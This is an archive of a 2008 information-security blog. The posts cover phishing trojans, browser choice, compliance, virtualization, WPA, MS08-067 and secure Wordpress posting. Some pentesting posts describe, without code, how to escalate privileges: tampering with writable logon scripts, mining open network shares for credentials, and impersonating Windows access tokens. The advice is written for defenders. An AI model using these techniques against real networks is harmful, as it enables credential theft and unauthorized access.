Wednesday, December 31, 2008

Some good predictions for 2009

Sorry if you were expecting something big. Usually the best next year's predictions are the dullest ones. Until now I found these from Andreas Antonopoulos the best. But what do I mean by best?Best as those with the biggest chances of being right. According to the Black Swan theory (funny, I remember Antonopoulos and Dan Kaminsky discussing it during the bloggers meet-up back in April at RSA) I believe that we cannot predict huge things, as they are usually not expected to the point of being unpredictable. Also, there are not many "big happenings" on the security history, so there is no point in generating predictions full of big happenings. Can you remember a year full of information security huge stories?Antonopoulos predictions point to natural evolutions of current situations and threats. He may miss some big bang stuff that eventually happens, but I wonder how many will get that one right, if it really happens.A very good 2009 for all of you. Thanks for reading all this crap during 2008. I hope to be a little more present and provide a little more content next year (new year resolution #n?). After all, life will probably be a little more stable. Or not. :-)

Friday, December 19, 2008

War and Information Security

Andrew Hay has posted a very nice piece on how war strategies evolved and how that compares to information security. He finishes it with this very nice line:"I believe that all security professionals should be students of military history and tactics. Seeing what failed for great generals will show us how to adapt to, and defend against, network and system attack situations in the future."I definitely agree with him.

Phishing now installing malware...NEW?

I was LOL when reading about this "new stuff" from Network World today. They are saying that last August phishers started to change from trying to get information from victims to tricking them into installing malicious software? LAST AUGUST? Hey, that is happening in Brazil for years by now.In Brazil the banks were suffering with phishing back in 2002, 2003. As the losses there were huge they started a big campaign to educate their customers about the threat. Soon, people would be avoiding any messages that appeared to come from their banks. The criminals quickly changed their methods.As people had been taught to avoid clicking on links on "messages coming from banks", Brazilian phishers quickly started to send messages that would use any possible reason to trick people into clicking into their links. Those links were redirecting people to download executables, the famous "bank trojans" that were mentioned on the last Microsoft Intelligence Report. Messages could appear to be those "virtual postcards", fake former university/college/high school colleagues sending their "see how I am know", pictures from the last plane crash, among others. Everything was a reason to a new burst of fake messages tricking people into clicking into links.With that approach we could also see the trojan/backdoor evolution. They started as simple keyloggers sending passwords to an e-mail account through SMTP. When the banks started using screen keyboards the malware also started to capture screenshots. When banks started using OTP cards, trojans started to open windows when the victim was visiting the bank's website to request "card activation", obviously requesting all the 40 numbers in that small card (!). Do I really need to say that people believed and were doing that? :-)Now several banks are using OTP tokens. The "bleeding edge" trojans are now trying to change valid transactions from the user, by changing the bill that is being paid or even the destination account of a money wire transfer. That only shows that whenever it is economically feasible, malware will always evolve to match security measures.

Why people stick to IE...or why should they change?

It's interesting to see some reactions afters the IE 0-day thing that happened last week.  There is one that always appear on these situations, the old question "why people don't change from IE?".First, I believe this question should be answered in two parts, home users and corporate, with the final answer being the result of both together. Andrew Hay answered that properly for the corporate side. For the home user I believe that biggest challenge is to make people aware of other browser existence and that changing from IE to another won't be that hard. Mostly an awareness problem. However, if there is a situation where the recently Firefox-converted-user tries to access a website and it doesn't work well, he will switch back to IE and assume that "switching browsers is no good cause the other browsers don't work".OK, the problem of "why people don't change" is not that hard to understand. However, my question is a little different, why should we change? Or, should we really change?Security issues are the results from threat presence and vulnerabilities. Internet Explorer is a huge target today, making the "threat presence"  something quite big. But that happens mostly because of IE's market share. If you are trying to exploit browser vulnerabilities you will probably aim on the browser with more users, making it easier to find a vulnerable target. Will that still be true about IE if others browsers are able to catch up on the market share? I'm certain that exploits, malware and drive-by attacks will start to be very common to other browsers if they are able to achieve a higher market share.Finally, on the vulnerability side, there are some indications that IE is not that bad, or that it is at least as bad as the others. It's not fair to judge the security of a software by looking into a single vulnerability, as it seems to be the case for IE now.Having said that, I must say that I use Firefox for security reasons. I do that mostly because most of the THREATS are IE related, not necessarily because I think IE is more vulnerable. If Firefox market share grows to a point where malware production targeting it starts to be higher than for IE, I'll certainly switch browser again (Chrome?).OK, some might say that I just presented a different reason why people should move from IE to Firefox, but that still needs to be done. Yes, I would suggest that for home users, but if the move starts to happen in a massive way and also including corporate users, the results from it will probably be innocuous. Funny isn't it? To keep Firefox more secure, it's better that people don't change.That's the perfect example where a Nash equilibrium solution would fit. That's also aligned with Dan Geer ideas about software monocultures. How to achieve that perfect solution? If I knew it I would be a millionaire by now :-)

Tuesday, December 16, 2008

2009 predictions

Everybody is doing that, so I'll try some too. But I won't try any bold move here, like Paul Asadoorian did :-)I'll mention four main things:

  1. Apple threats: the number of people using Macs is growing very fast. It is starting to become something attractive for botnet herders, specially because almost all Mac users don't have anti-malware software installed nor have the habit of worrying about it, so it's easy to mantain the bots installed. If it was in the past I would think about a big worm coming, but cybercrime is reality now and those guys know when an opportunity like this arises.

  2. Blended/Hybrid Threats: We are seeing this already, like this malware that exploits SQL Injection and an IE vulnerability. I believe we will see a lot of threats using multiple attack vectors, maybe even from different platforms and technologies. Vulnerabilities than can be used to redirect traffic from multiple users (like Dan Kaminsky's DNS bug) will be used to force people to access infected content, that will trigger other infection mechanisms. Worms will be able to disseminate to a higher number of hosts without generating suspect spikes on charts, as the malware code will randomly choose between several infection methods to spread itself. Expect some huge botnets being found as a result.

  3. At least one "cloud computing" security incident: Ok, not that hard to say that, but I'll try to be a little more specific in the details :-), there will be a discussion about what was compromised (infrastructure? application? vendor? client?) and people will start discussing how to conduct forensics on those new conditions.

  4. Virtualization nightmare: A vulnerability will be found in a virtualization platform or in a virtualization-aware product, enabling attacks from one guest OS to another (or even reaching a Guest OS and triggering the exploit on another).  It would be extremely fun to watch those "the cat is on the roof" discussions. A new wave of miraculous products will be released to solve the issue from that specific kind of attack. Your VM infrastructure will look like a Christmas Tree and the operation cost of a virtualized environment will not be what was expected anymore.
Let the game begin! Let's see how I'll do in 12 months :-)

Thursday, December 11, 2008

Keep alive

As all the bloggers sometimes do, I'll also post a simple "keep alive" here just to show that this is not a abandoned blog :-)It is holiday season, with guests at home, more things to do at work and too few interesting things to comment out there. So, please don't unsubscribe, I'm keeping some notes about what to post and I hope to start 2009 with some good content here. Thanks for your patience :-)

Tuesday, December 2, 2008

Can good programmers be part of a SDLC?

I've just read this small article from Paul Graham, called "The other half of 'Artists Ship'". The key point of the text is this:"For good programmers, one of the best things about working for a startup is that there are few checks on releases. In true startups, there are no external checks at all. If you have an idea for a new feature in the morning, you can write it and push it to the production servers before lunch. And when you can do that, you have more ideas.At big companies, software has to go through various approvals before it can be launched. And the cost of doing this can be enormous—in fact, discontinuous. I was talking recently to a group of three programmers whose startup had been acquired a few years before by a big company. When they'd been independent, they could release changes instantly. Now, they said, the absolute fastest they could get code released on the production servers was two weeks.This didn't merely make them less productive. It made them hate working for the acquirer."Assuming that writing secure code and the complete Secure Development Life Cycle can be described as "checks" and "controls", it would be natural to assume that good programmers don't want to work for companies with a SDLC in place. That is certainly an important thing to consider when considering a more secure approach to software development. We know that a SDLC works for generating more secure code. But can we keep the good programmers while doing that? Can this issue be a problem big enough to make a company choose to not implement a SDLC?

AV on Mac

Of course you will need that, as even Apple is sayingnow. I can say that the need for anti-malware is one of the "growing pains" for end user Operating Systems. Soon they will start to suffer from backward compatibility issues, "too dumb" users, bad written applications and other problems that WIndows had to deal with during the last years. At least there are still the hardware vendor "monopoly" for Mac OS, what makes things a little easier for the OS. The other things will likely be exactly the same.

Monday, December 1, 2008

VP has taken the red pill

My friend VP has just discovered that everything is broken.He is talking about his last work on pentesting web applications. I had the same feelings about basic network infrastructure, like privileged credentials, file shares, the xyz-illion unidentified devices plugged to the network.The interesting part of this job is not realizing that everything is broken. He probably went through an amnesia crysis or something like that, cause we noticed that ages ago. The real issue is not that, nor trying to fix everything, but how to achieve business survivability/assurance without having to fix everything. That's the kind of challenge that is really interesting!

Wednesday, November 26, 2008

Windows pen testing - access tokens

I'm a bit late on this subject, but I think it's worth a post. For those who usually do pentesting and usually get some access to Windows boxes, but are looking for a specific credential (like a domain admin), impersonating access tokens available can be a very useful approach. The details about how to do it and tools available can be found in this paper from Luke Jennings.By the way, Jennings also published some good stuff about MQ Series and general mainframe security stuff. You can find it (and more) at MWR Labs.

Tuesday, November 25, 2008

Simple but dreadful, part 3 - Workstation local administrator

The logic behind risk management makes almost all companies to focus on protecting their servers instead of spending time on the workstations. Although it seems to make sense, it is important to note that people access, generate and input information on sensitive applications and servers mostly through their workstations. Owning the workstations of an organization can be as bad as owning its servers.One of the easiest ways to do that is to identify how the organization deals with the local administrator account of the workstations. Setting a password for the local admin account seems to be a easy thing to do, bu when you have thousands of workstations it can really become a nightmare. Some companies try to set a single strong password for all workstations, but that means if this password is compromised the keys to the whole kingdom are lost. You may think that using a very strong password can avoid problems from offline cracking (together with disabling LanMan password, etc - I assume you know the basics about Windows passwords), but remember that if a single guy from IT support (the guys who know that password) is fired or discloses the password to someone out of the entitled circle, you will have to change it on ALL workstations. Now, if you can do that (yes, there are lots of companies that are not even prepared to do that), it would be a good idea to start thinking about using a different password for each workstation. You may think I'm crazy, but there are tools that allow you to do that in a pretty decent (and secure) way, from a central location and with a lot of controls over who access those passwords.Also remember that if you properly manage permissions on those workstations you will most likely never use that password. You will have a group of the administrators as part of the "local admin" group for each box, meaning that they won't need the admin account to do anything there, giving you the bonus of better accountability.Some things to avoid when defining your strategy to manage workstations local admin passwords:

  • Logon scripts with clear text passwords (noooo!!!!!!!!!!)

  • Scripts from SMS or other central management tool with clear text passwords (believe me, the users will found that!)

  • That-same-very-secret-password-that-only-those-ten-guys-know-about-for-all-boxes mistake (yes, I mentioned that before. Just in case)

  • Different passwords generate by a "security by obscurity" algorithm that uses the name of the workstation as input. Hey, if it's a bad idea on encryption why would it be a good idea for passwords?

Friday, November 21, 2008

After all, how infosec is related to SOX??

Yes, a lot of security professionals went to the bill's text and were not able to find anything related to information security, even when directed to sections 302 and 404. I was very happy to find this post from the eIQnetworks blog today, as it is written in the same exact way that I use to explain this issue to those who ask me. So, to save some words, you can go directly to their post.

Friday, November 14, 2008

I've never seen my previous CSO role so well explained

I've stumbled upon this blog from Shrdlu (that just entered into my blogroll) and found a very good piece on why a CSO ends up working more (ok, as much as) than his/her employees.Also a very good post from him on incident response.

Mogull on adaptative Auth and AuthZ

Richard Mogull mentions on his blog today the concepts of adaptative Authentication and Authorization. In short, from his post:

  • "User: This is an area I intend to talk about in much greater depth later on. Basically, right now we rely on static authentication (a single set of credentials to provide access) and I think we need to move more towards adaptive authentication (where we provide an authentication rating based on how strongly we trust that user at that time in that situation, and can thus then adjust the kinds of allowed transactions). This actually exists today- for example, my bank uses a username/password to let me in, but then requires an additional credential for transactions vs. basic access.

  • Transaction: As with user, this is an area we’ve underexplored in traditional applications, but I think will be incredibly valuable in cloud services. We build something called adaptive authorization into our applications and enforce more controls around approving transactions. For example, if a user with a low authentication rating tries to transfer a large sum out of their bank account, a text message with a code will be send to their cell phone with a code. If they have a higher authentication rating, the value amount before that back channel is required goes up. We build policies on a transaction basis, linking in environmental, user, and situational measurements to approve or deny transactions. This is program logic, not something you can add on."
I'll keep out from this post the ideas about cloud computing, layers and the real meat of his post, but I want to stress how nice the adaptative authentication and authorization concepts are. Richard is right when he says that banks are already doing that, I remember including the concept in the online banking of a Bank I worked for almost 4 years ago. The thing, however, would be trying to bring that to other authentication and authorization actions that exist inside (and outside, in the cloud, whatever) the organization. It could be used to further protection on privileged IDs, to enforce higher controls over remote access from potentially malicious networks, specific time ranges, and a lot of other things that could be used to indicate a higher threat level. In fact, it could even be deployed by transparent proxies in front of the applications without a need to change code or hard to deploy integrations.Definitely, something that should be better explored by security vendors.

TCG IF-MAP

I was very excited to read about TCG IF-MAP on Chris Hoff's blog last week. Chris found that interesting as something that could bring some light to the "cloud nightmare" and to virtualization issues.I like IF-MAP, however, because it raises the security intelligence level on the network. Today most of SIEM installations are working mostly with information from network devices and concentration points, like firewalls and IPSes. There are a lot of things happening in the endpoint world, behind those enforcement points, that is not usually detected and feed into correlation systems. IF-MAP seems to be a nice way to leverage security information along security tools, including SIEMs, to allow better correlation. Look at this example from the IF-MAP FAQ:"Q. What can people do with IF-MAP?A. The IF-MAP 1.0 specification supports many use cases. The following are two examples:• An intrusion detection system with an IF-MAP client publishes an alert to an IF-MAP server ( “IP address 10.10.100.24 is sending anomalous traffic” ); A firewall that subscribes to information involving 10.10.100.24 receives a notification from the IF-MAP server, triggering an automatic response• A Security Event Manager (SEM) system queries an IF-MAP server to find the aggregate associations between the IP address and MAC published by the DHCP server, the user name published by the RADIUS server, and the hostname published by the DNS server.Since IF-MAP is extensible, more use cases may be supported in the future."I always believed that effective correlation on security should be able to deal with information from different layers, like MAC, IP, Port, user name, information context, physical location, among others. Sometimes two events don't show any correlation when looking at the network level, but when you look at them on higher layers you can see they are referring to similar things. With this perspective you can not only figure out that the exploit from IP X being detected by the IDS and blocked at the firewall are the same event (ok, it has its value, but not that much), but you also can start to identify colusion between different internal users to bypass segregation of duties controls, privilege abuse and stolen credentials in use. That should be the play field for security intelligence, and IF-MAP can help vendors to produce tools that can do that.

Friday, November 7, 2008

Sarbanes Oxley, good to hear people questioning

John Pescatore is right when he says that talking about less regulation at this time seems to be not aligned with the current crysis, but the article he is pointing to is very precise on saying that the costs from SOX are pretty high and, as we could see, it wasn't able to prevent cases like Bear Sterns, Lehman Bros., AIG and Merrill Lynch. Accountants are as creative as lawyers, they will always look for breaches in the controls (laws) to do their magic.

SOX brought a lot of money to Information Security, but it also brought some directed focus on some controls that are not always the most required for all organizations. It would be nice to see a review of the law, verifying its results and actual costs.

The WPA sky is not falling

A lot of noise about a new research that "cracked" WPA was made this week. Well, there are more details about it today, and they clearly show that the WPA sky is not falling.

There is a very good abstract of what is happening on the article above:

"To describe the attack succinctly, it's a method of decrypting and arbitrarily and successfully re-encrypting and re-injecting short packets on networks that have devices using TKIP. That's a very critical distinction; this is a serious attack, and the first real flaw in TKIP that's been found and exploited. But it's still a subset of a true key crack."

So, it's not the final attack against WPA protected networks, but it is a very important building block for more elaborate attacks. I can see that in a near future we will see more serious stuff being done using this as a starting point. Keep your ears open.

Friday, October 31, 2008

Virtualization? Give me a better OS instead!

Do we really need to go that deep into virtualization? I may sound dumb to try to reason against something that everybody is embracing, but that's usually what I like to do about hypes :-)
OK, you'll probably throw a lot of advantages of virtualization on me. And I agree that most of them are true. I was reading that some companies are being able  to increase their hardware processors utilization from 10 to 60% through virtualization. There is also all that high availability stuff from VMotion and other new products that are being released everyday. OK, but...
Let's go back some years and see how we end up where we are. Imagine that you had to put two new applications in production, A and B. To ensure proper segragation you decide to put both applications on their own servers, X and Y.
Of course, are they are both critical apps, you also build servers Z and V for high availability purposes.
In a few months, people start to complain the servers utilization is too low. They are consuming too much power, rack space, blah blah blah. Ok, then someone gets a nice rabbit from a hat called virtualization. Wow! Now you transform the hardware X and Y into VM servers (or whatever you wanna call it), build separate VMs for A and B and as you VM product has a nice feature of dynamically moving images from a box to another, you don't need Z and V anymore. Wow! You've just saved 50% of servers related cost!
OK,  could probably be worried about putting those application in the same "real" box. After all, you decided before that they should be running on different servers, and here they are on the same box! But you look into the problem and notice:
- One virtual server cannot interact with the other- Problems caused by application A still can't cause problems on application B server- A security breach on virtual server A will not affect virtual server B
Ok, everything is still good and you go to bed happy with the new solution.
No, people are greedy!
Seriously, now that we have all those servers on the same box, why can't we have a little more control over their access to resources available? Like, if one server is not using all memory allocated to it, why can't the other one use that when it needs? Same for processing power, storage? But in order to do that the Hypervisor would need a better view into what is happening into those black boxes...why not make them aware of the VM environment? Build APIs that allow communication between the guest OSes and the hypervisor? Nice! Now things are starting to get really advanced!
But where is that segregation that was mentioned before? Won't all this interaction between the HV and the guest OSes reduce the isolation? Of course it will! Some attacks from guest OSes to the HV or to other guest OSes are now possible. Anyway, it's the price for better management and better resource utilization. Isn't it?
Yes, it is. We already knew it! Isn't it the price to put two application on the same REAL box? Let's see. We want hardware resources to be shared by the applications and something controlling it. One application shouldn't be affected by the other or access non-authorized resources. And we want high availability too.
Well, please tell me if I'm wrong, but for me these things are just the requirements of a good Operating System with cluster capabilities!
Virtualization guys usually refer to mainframes as a virtualization success case. They are right about it. But on mainframes LPARs (their name for VMs) are usually used to isolate completely different environments, like development and production. It is very common to find several applications running on the same LPAR, being segregated only by the OS and Security Manager (that can be seen as part of the OS). Usually, LPARs are used because organizations can't afford different hardware for things like, testing, certification and development, whilst on the "new virtualization" world VMs are used to optimize resource utilization. As far as I remember from my Operating System course classes from university, that was the Operating System role.
Are we creating this beast because we couldn't produce a Operating System that does its job?

Tuesday, October 28, 2008

I left this one pass

I was visiting Dan Kaminsky's blog today and I noticed that he is creating a community council to help on the disclosure of big vulnerabilities like the one he found on DNS and others that followed, including that famous one on TCP that Robert E. Lee and Jack Louis are planning to disclose after vendors have issued their patches. This is a very good outcome of all these happenings from the last months.

With a council like that everybody who finds a vulnerability and thinks that it is critical enough to start a coordinated effort to fix it and disclose the details will have a safe place to go. Not only it will be full of people with enough knowledge to verify their claims and to make sure it is not something old or not-that-big, but it will also be a trusted part that won't "steal" the credits for the discovery. If they manage to make its existence and their purposes known to the security research community the only reason for someone to go into a "partial disclosure" alone will be "flash fame".

Another step towards a more mature security research community. Nice!

Financial malware gets smarter? But we've said that many times!

This is yet another case of predictions coming true; Now it's Kaspersky time to say that malware is changing the way they attack online banking users to defeat two-factor authentication. Tjey even try to create a new security buzzword for that:"For example, two-factor authentication for online banking, which uses a hardware token in addition to a secret password, is increasingly ineffective. This is because malware writers have perfected the tools to get around it by redirecting the user to a separate server to harvest the necessary access information in real time – the so called ‘man in the middle’ attack.This defeats the two-factor process, but malware writers have taken the process a step further with a new ‘man in the endpoint’ attack. This eliminates the need for a separate server by conducting the entire attack on the user’s machine."Nice catch, but we are saying that this would be the next logical step for financial malware evolution since 2005. Now that it's here the important questions is, how we're gonna deal with that? If 2FA doesn't work, what does?There are some interesting stuff being developed to provide a "secure tunnel" inside the user's computer, avoiding keyloggers and other nasty stuff. But again, we end up on that malware x protection_software_whatever at the user computer. Every time a security company develops something to protect resources from being tampered by malware, malware evolves to get the information from a lower level layer or by disabling the security software. This problem won't go away until we can assure that security software will always run in a higher privilege level than the malware.I like Windows Vista because of the effort on trying to make the user run as a non-privileged user. Unfortunately, this hasn't been the MIcrosoft OS user culture for years, it won't start from nothing. UAC tried to make it less painful, but the huhe amount of badly designed 3rd party software turned that feature into a nightmare. Even with all SDLC efforts there are still a lot of things out of Redmond's company  to be done. Unix and Linux has technology and security conscious users. Apple has complete control over hardware and software. Microsoft, in the other hand, lives in hell (no control over hardware AND software + the most dumb users).A intermediate option to secure online banking transactions is trying to explore the different devices that banks customers have. There are some products that implement 2FA on mobile phones, but most of them suffer from the same vulnerabilities as regular 2FA tokens. Challenge-response and transaction signing could be leverage mobile phones as a OoB (out of band) factor. A over-simplified example would be:- User on computer intiates transaction- Bank encrypts the transaction data received with the user public key and send it by SMS to his mobile,  together with a confirmation code- The bank's app on the phone receives the message and decrypts it with the user private key- The user verifies the details of the transaction on the mobile and, if everything is the same as it was sent from the computer. The user sends the confirmation code to the bank (can be done from out of the previous session, to minimize the assyncronous nature of the conversation), who finishes the transaction.You may ask why the user answers the challenge from the computer instead of doing that from the phone too. This would be good as end user's SMS messages can have a different priority level to the mobile networks than the messages sent by the bank, who can buy differentiated SLAs from them.I know that there are lots of challenges in this single example (public key encryption on devices with limited resources, protecting the user private key, mobile network dependency, among others), but it can be seen as a way to allow users to do banking over untrusted channels. The catch here is that only half of the transactions passes through a untrusted channel. One can argue that the mobile network is also untrusted, but in order to allow fraud both channels would have to be compromised by the same attacker. Very unlikely (not impossible!).

Thursday, October 23, 2008

Microsoft MS08-067

I have been away from the blog for a while because of a series of reasons, but I couldn't avoid to comment on this recently published advisory from Microsoft, MS08-067. Just as some worms we witnessed in the past, this one is related to a core Windows service, meaning that almost all boxes are vulnerable. It's also interesting to see that the security efforts related to Vista and Server 2008 had brought results as those versions are not as vulnerable as previous versions to this issue. Thanks to DEP and ASLR for that!Now it's just a matter of time for the first worms and bots. I'm already seeing some emergency patch management processes being fired to deal with that, but it's important to ensure that detection and reaction capabilities are also up-to-date. Keep an eye on the sources for IDS signatures and be sure to check if your SIEM/Log analysis systems are able to identify abnormal traffic related to the Server service (139/445 TCP). Do a quick review of your incident management procedures to ensure that people will know what to do if the bell rings. For instance, if you catch signs of infection in your internal network, how will you act to identify and clean the infected computers?May the Force be with you!

Saturday, October 18, 2008

Victor is back

My friend Victor is back to the blogosphere. He built a blog platform just for his new blog, Visigodos.org.He blogs about a series of things, but mostly on software development and security. His last post (VP, you need to develop something to link directly to an specific post!) about vulnerabilities related to debugging code is pretty interesting.Welcome back, VP!

Wednesday, September 24, 2008

Which compliance pill to take?

Anton Chuvakin wrote a very good piece about PCI and how regulations like that are usually written and interpreted. He is completely right on defining the problem as:

  1. Mandate the tools (e.g. "must use a firewall") - and risk "checklist mentality", resulting in BOTH insecurity and "false sense" of security.
  2. Mandate the results (e.g. "must be secure") -  and risk people saying "eh, but I dunno how" - and then not acting at all, again leading to insecurity.
About those options, he says:

"Take your poison now?! Isn't compliance fun? What is the practical
solution to this? I personally would take the pill #1 over pill #2 (and
that is why I like PCI that much), but with some pause to think, for sure."

Actually, I believe it may be possible to reach an intermediate alternative. By defining the rules and standards for Risk assessment and management we could set the standards on defining acceptable risk levels instead of saying "must be secure", and without the need to go as deep as "must use a firewall". Of course that this approach would cause several questions about how to achieve compliance, but it would give more freedom to organizations about how to approach the risks and avoid "checklist mentality".

The problem with risk management based compliance is that the organization can manipulate its risk assessments and downplay stuff that should be identified as "high risks". If the risk equation, impact and probability levels are standardized, however, it would be easy to compare apples to apples and say things like "risks above level X must be mitigated until level Y".

Even by taking that approach we would still have to deal with the control efficiency problem. Like the firewall that Anton mentioned, there are several controls (probably most of them) that the way that they were implemented and how they are managed are even more important than the control itself. Maybe the best way to solve that is defining appropriate ways to deploy and maintain each proposed control. Ok, we could go into a very deep (and inefficient) level of details by doing that. Seems to be a catch 22 situation. Personally, I don't know who is worse to point where the bar should be placed: auditors or standard writers. I don't trust both :-)

Thursday, September 18, 2008

It is so obvious that it hurts

Just found it:

People a big security threat to virtualization, Interop speaker says - Network World

People a big threat to virtualization?? Woo!!!

If you replace "virtualization" by any other hot technology you will see it will also be true.

Security is always designed and deployed in a way that it relies on people's decisions. Security is often a minor priority for people, so they'll make decisions based on other aspects, like time and budget constraints.

That is, you can expect people to make bad security decisions. If security controls are based on people's decisions...there's your "big security threat".

Tuesday, September 16, 2008

Wordpress security

I wrote in a rush about testing the blog "desktop clients" last week and I think I didn't make it clear about why I was doing all that testing and the results from them. OK, I'll try to summarize it.

My blogs are running on Wordpress on a regular hosting service. I have my own domain names, but I don't have and I don't want to spend money on digital certificates for them. So, if I want to access my websites over SSL I need to use a "generic" domain name from the service provider, like mydomain.sslpowered.com or something like that. The problem with that is the way that Wordpress handles the URLs you are using. If my website is on www.securitybalance.com I can try to access the admin part of wordpress by another URL, like securitybalance.sslpowered.com. So, how can I post to my blog over a protected connection?

I was reading a lot about some plugins for Wordpress, some mod_rewrite stuff, and other magic stuff. I wasn't feeling very confident about any of those. Then I learned about the XML-RPC interface for Wordpress. It is a webservice used by several platforms as an standard API for blogging. I noticed that the "blogging desktop clients", applications used for those that want to write their posts off-line to upload them later, usually access the blog using that API. What if I tried to call that webservice (wordpress_blog/xmlrpc.php) using my SSL URL? Well, it turns out that it works! I just had to find a good desktop blogging client that could satisfy some personal requirements (running from my portableapps thumb drive), and I end up with ScribeFire. It goes into Firefox as an add-in, what makes it even easier to use. I tried Zoundry first, but it is vulnerable to a man-in-the-middle attack, as it can't recognize a bogus certificate.

So, the tip for wordpress bloggers is: Use ScribeFire with a SSL protected URL for your XML-RPC API instead of posting through the regular wp-admin interface.

Monday, September 15, 2008

Good tip to fight laptop theft

Today I was in the office of a company where almost all the employees work on laptops. Everybody receive a security cable to secure the laptop on their desks to prevent theft. There is that old problem, "how to educate the users on using the security cable?". They found an interesting way to educate the users there. The IT support personal "steal" the laptops they find unprotected and leave a note on its place, something like that:

"Your laptop has not been stolen.

It has been removed from your desk to illustrate how easily it can go missing when not properly secured. [...]

Your laptop can new be picked up from [...]"

OK, I know it can cause some squeals from those I-don't-have-time-even-to-get-the-laptop-there people, but it's a nice way to make people see the risk. I like it.

Friday, September 12, 2008

And now, ScribeFire!

I've tried ScribeFire before and I was not impressed by the idea of blogging from Firefox. If had to use the browser, why not connect to wp-admin directly? Well, with my new quest for "Blogging clients" that can use my xmlrpc SSL-protected URL I end up by trying it again. Here I am, trying ScribeFire. It accepted well the https URL, so it seems to be a good option for "secure blogging" on Wordpress blogs.

You may wonder, if you saw my last post, why I didn't stay with Zoundry. Well, for two main reasons. One is that Zoundry seems to be a bit bloated, being too slow to run from a Portable Apps environment (anothet of my requirements). But the death blow on that tool came when I was checking if it was using the HTTPS xmlrpc properly by putting it behind a Paros Proxy. It used the HTTPS URL and it didn't mention the fact that the ssl certificate was not valid for that site! Yes, Zoundry Raven is vulnerable to a simple SSL man-in-the-middle attack.

So, until now, ScribeFire seems to be the choice.

Media_httpwwwsecurity_xaydf

Zoundry Raven test

I'm testing Zoundry Raven calling the XML-RPC interface of Wordpress on a SSL URL. It's maybe an alternative to secure posting, as I can use the "shared certificate" URL for this, what can't be done with the regular wp-admin Wordpress interface. I just need to check if this thing doesn't "escape" from the specified URL to do other stuff.

Thursday, September 11, 2008

Security by economic obfuscation

This is how Chris Hoff is calling the fact that vulnerability researchers don't spend time looking for holes in commercial (and expensive) software products, like virtualization platforms.I think we are living with this for a long time. I can mention mainframe software (even without buying hardware researchers could run it on emulators like Hercules), ERP systems (SAP) and Application Servers, like Oracle and IBM, as software that is not receiving the proper attention from vulnerability researchers. I'm pretty sure that a lot of interesting vulnerabilities would arise with more research was focused at them, but their licenses prices are too aggressive to allow more people to install and test them.

Simple but dreadful, part 2 - Network shares

It would be impossible to write about low hanging fruits without mentioning network shares. I say it because they are usually my favorite path to elevate privileges when I'm performing a penetration test. Among stuff that I've already found on unprotected (I mean, Everyone - Full Control) shares are:- Source code for critical applications- Configuration files of applications containing database credentials (VERY COMMON)- Configuration files of applications containing Administrator level credentials for servers (service passwords!)- Debug logs containing a lot of sensitive information and even user credentials (SMS logs!)- Network and systems documentation (Lot's of Visio diagrams)- Personal private information (Human Resources stuff)Network shares appear and grow on the network like tribbles. The problem starts with weak policies regulating the subject, but it grows when the infrastructure needed as an alternative for non-authorized shares is not available. If you compare companies that have a good file server infrastructure with those that are trying to save some bucks by saving file server megabytes you will notice that the last has a higher occurance of non-authorized file shares. Non-authorized network shares fall in that "Shadow IT" category and are an easy bet for unprotected sensitive information. I can tell from experience that just by browsing network shares you can own an entire network. No need for leet exploits.If you are just starting as a security manager, include it as one of your first steps: map and control your network shares. You need to know where they are, what is inside and who can access them.

Wednesday, September 10, 2008

NAC and DLP

I was reading a comment from Shimel mentioning that NAC technology is becoming more mature every day, as we can see more 3rd party products integration. He mentions the integration of a IPS system, what promptly made me wonder about another kind of security product: DLP.Have anybody tried to integrate DLP and/or e-Discovery products with NAC? Can you imagine the possibilities? You can build a policy where workstations with protected/sensitive information stored have their connectivity restricted to reduce the chances of data loss. Your computer is free from protected information, you can browse the Internet with more freedom than that guy with sensitive files in his hard disk. I wonder if anyone from Symantec is trying to do that with Vontu and their Endpoint Protection suite.

Wednesday, September 3, 2008

Best Practices - Even Dilbert know what they mean

You can see it here.So what are the quick wins you can do on security to go beyond best practices? Feedback would be nice.

Friday, August 29, 2008

(ISC)2 Board candidate

Wednesday I went to the TASK meeting and learned about Seth Hardy, who is trying to get his name included in the (ISC)2 Board ellection ballot. I really don't know Seth, but I don't like the 1% rule from (ISC)2, where a member who wants to be a candidate for the Board must gather signatures of 1% of the members to be able have his name included in the ballot. I also like what TASK does, as they really seem to be like what the Brazilian ISSA chapter used to be when I was there. By that alone I think he deserves credit to be at least included in the ballot.So, if you are a CISSP, please visit http://sethforisc2board.org and sign his petition!

Tuesday, August 19, 2008

Simple but dreadful, part 1 - Logon Scripts

Now that I'm back to pen testing I'm having the chance to see the mistakes that admins are going into nowadays. There is something very interesting that Windows domain administrators sometimes forget and needs to be addressed as it brings serious security implications: login script files permissions.Login scripts are those little batch scripts that run when the user is logging in. They're usually stored in a share at the domain controllers called NETLOGON. The risk here is quite obvious; if I can modify your login script, I can run commands under your user account when you are logging on. This is usually not possible as the NETLOGON permissions are usually set accordingly, being writable only by domain admins.The problem is that login scripts are one of those complexity beasts that grow together with the organization and its network. Big organizations usually have lots of servers, file servers, domains and other stuff. The admins struggle to keep user lives a little easier by automatically mapping network drives, cleaning temporary file transfer areas and other stuff, and the login scripts are a good tool to do that. When doing that they sometimes need include some different command line utilities, as the regular Windows shell doesn't have all the features needed by those very creative admins. When doing that, they usually place those executables on network folders accessible by all users (of course, as they need those files during the login process :-)). What happens is that when doing that they often give too many rights for the users on those folders. Remember, when you create a folder and then share it on a Windows Server without changing any permissions there is a big chance that it will be a "Everybody - Full Control".
If you are a domain admin in a organization that extensively uses login scripts, check them for external executable references. Tampering with login scripts is a easy way for a insider to steal credentials and information from other users without being detected.

Friday, August 8, 2008

Portknocking, SPA and SOA

I already mentioned how I like stuff like port knocking. It can't be used as replacement for other security measures, but it's a nice way to keep important stuff out of radar. Imagine if you had some SSH daemons remotely accessible when that OpenSSL PRNG crisis started. I saw lots of admins running to replace flawed keys for servers because of that. If those daemons were hidden behind some portknocking stuff, it wouldn't be necessary to rush.Today I read some interesting stuff about SPA, or Single Packet Authentication, to protect SOA resources published on the web. I must say that it's a nice way to avoid too much attention on them. It would be nice to see this being integrated into frameworks.

Thursday, August 7, 2008

The future of mass card theft (and PCI)

